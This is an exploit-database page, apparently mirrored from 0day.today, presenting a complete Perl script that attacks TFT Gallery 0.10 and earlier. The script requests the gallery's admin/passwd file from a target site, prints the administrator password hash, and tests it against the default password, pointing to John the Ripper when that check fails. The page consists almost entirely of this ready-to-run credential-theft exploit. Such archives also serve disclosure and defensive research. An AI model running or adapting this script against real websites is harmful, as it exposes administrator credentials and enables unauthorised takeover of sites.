Lucene search

TFT Gallery <= 0.10 [Password Disclosure] Remote Exploit

🗓️ 25 Mar 2006 00:00:00Reported by undefined1_Type

zdt🔗 0day.today👁 18 Views

TFT Gallery Remote Exploit for Password Disclosur

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

========================================================
TFT Gallery <= 0.10 [Password Disclosure] Remote Exploit
========================================================




#!/usr/bin/perl

###############################################################################
#Copyright (C) undefined1_
#
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; either version 2
#of the License, or (at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
###############################################################################

use strict; 
use IO::Socket;

$| = 1;
printf ":: tftgallery 0.10 exploit - by undefined1_ @ bash-x.net/undef/ ::\n\n\n";


my $website = shift || usage();

my $path = "/";
my $site = $website;
if(index($website, "/") != -1)
{
	my $index = index($website, "/");
	$path = substr($website, $index);
	$site = substr($website, 0, $index);
	if(substr($path, length($path)-1) ne "/")
	{
		$path .= "/";
	}
}


my $eop = "\r\nHost: $site\r\n";
$eop .= "User-Agent: Mozilla/5.0\r\n";
$eop .= "Connection: close\r\n\r\n";


my $packet1 = "GET ".$path."admin/passwd HTTP/1.1";
my $data = sendpacket($site, $packet1.$eop);

if($data !~ /HTTP\/1.1 200 OK/)
{
	die "failed to retrieve the admin password\n";
}

my $password = "";
if (index($data, "\r\n\r\n") != -1)
{
	$password = substr($data, index($data, "\r\n\r\n")+4);
	chomp $password;
}
else
{
	die "failed to retrieve the admin password\n";
}

print "The password hash is: '$password'\n";
if(crypt("admin","tftgallery") eq $password)
{
	print "The plaintext password is: 'admin'\n";		
}
else
{
	die "Use john the ripper, luke!\n";
}




sub sendpacket(\$,\$) {
	my $server = shift;
	my $request = shift;

	my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => "80") or die "[-] Could not connect to $server:80 $!\n";
	print $sock "$request";

	
	my $data = "";
	my $answer;
	while($answer = <$sock>)
	{
		$data .= $answer;
	}
	
	close($sock);
	return $data;
}

sub usage() {
	printf "usage: %s <website> [password]\n", $0;
	printf "ex. : %s www.site.com/tftgallery/\n", $0;
	exit;
}



#  0day.today [2018-01-01]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

25 Mar 2006 00:00Current

7.1High risk

Vulners AI Score7.1